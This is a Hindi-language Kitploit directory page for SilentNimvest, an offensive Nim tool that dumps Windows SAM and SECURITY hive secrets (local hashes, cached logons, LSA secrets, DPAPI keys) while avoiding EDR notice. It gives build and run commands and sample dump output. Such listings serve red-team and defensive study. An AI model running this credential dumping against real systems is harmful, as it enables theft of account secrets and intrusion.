Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
SilentNimvest — Nim implementation for sud0Ru's Credential Dumping from SAM/SECURITY Hives Method (a.k.a. SilentHarvest) | Kitploit
उपकरण/GitHubGitHub/frkngksl/silentnimvest
पासवर्ड क्रैकिंगविशेषाधिकार वृद्धिपार्श्व आंदोलनडेटा निष्कासनपोस्ट-शोषणरेड टीमिंग
GitHubfrkngksl/silentnimvest

SilentNimvest

Nim implementation for sud0Ru's Credential Dumping from SAM/SECURITY Hives Method (a.k.a. SilentHarvest)

रिपॉजिटरी देखें
106144 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

SilentNimvest

मूलतः, SilentNimvest एक SAM और Security Hives पार्सर है जो Nim में लिखा गया है। SilentNimvest Silent Harvest तकनीक का उपयोग करके इन हाइव्स के अंतर्गत कुंजियाँ पढ़ता है। इस तकनीक से, SYSTEM-स्तरीय विशेषाधिकार के बजाय, एक सामान्य Administrator खाता जो SeBackupPrivilege को सक्षम करता है (NtOpenKeyEx फ़्लैग्स के कारण), एक कम EDR-सचेत रजिस्ट्री रीड API जो RegQueryMultipleValuesW है, का उपयोग करके स्थानीय उपयोगकर्ताओं के हैश, कैश्ड डोमेन लॉगऑन जानकारी, LSA Secrets, और इन हाइव्स से प्राप्त होने वाले अन्य रहस्यों को डंप कर सकता है। यह पूरा प्रोजेक्ट sud0ru के शोध पर आधारित है।

संकलन

आप निम्नलिखित कमांड के साथ सीधे स्रोत कोड को संकलित कर सकते हैं:

nim c -d:release -o:SilentNimvest.exe Main.nim

यदि आपको "cannot open file" त्रुटि मिलती है, तो आपको आवश्यक निर्भरताएँ भी स्थापित करनी चाहिए:

nimble install winim nimcrypto checksums des

उपयोग

SilentNimvest को एक उन्नत Administrator टर्मिनल से बिना किसी आवश्यक पैरामीटर के सीधे निष्पादित किया जा सकता है।

root@kitploit:~
PS C:\Users\test\Desktop\SilentNimvest> .\SilentNimvest.exe
 __ _ _            _       __ _                         _
/ _(_) | ___ _ __ | |_  /\ \ (_)_ __ _____   _____  ___| |_
\ \| | |/ _ \ '_ \| __|/  \/ / | '_ ` _ \ \ / / _ \/ __| __|
 _\ \ | |  __/ | | | |_/ /\  /| | | | | | \ V /  __/\__ \ |_
\__/_|_|\___|_| |_|\__\_\ \/ |_|_| |_| |_|\_/ \___||___/\__|

                         @R0h1rr1m

[!] Trying to parse SAM Related Credentials (Local Users)

[*] Local User RID: 500 - Administrator - aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
[*] Local User RID: 501 - Guest - aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
[*] Local User RID: 503 - DefaultAccount - aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
[*] Local User RID: 504 - WDAGUtilityAccount - aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
[*] Local User RID: 1001 - zoro - aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0

[!] Trying to parse Security Related Credentials (Cached Domain Logon Info, Machine Account and LSA Secrets)

[*] DPAPI Keys: dpapi_machinekey: ea31d6cfe0d16ae931b73c59d7e0c089c037b & dpapi_userkey: 44431d6cfe0d16ae931b73c59d7e0c089c0d0
[*] NL$KM: 1f31d6cfe0d16ae931b73c59d7e0c089c031d6cfe0d16ae931b73c59d7e0c089c031d6cfe0d16ae931b73c59d7e0c089c0c01
[*] Plaintext User from _SC_Backupservice: .\zoro:SilentNimvest

संदर्भ

  • https://sud0ru.ghost.io/silent-harvest-extracting-windows-secrets-under-the-radar/
  • https://github.com/GhostPack/SharpDump
  • https://cocomelonc.github.io/malware/2024/06/01/malware-cryptography-28.html

अस्वीकरण

केवल अधिकृत सुरक्षा परीक्षण के लिए। स्पष्ट अनुमति के बिना सिस्टम पर इस उपकरण का दुरुपयोग अवैध है।

टूल डाउनलोड करें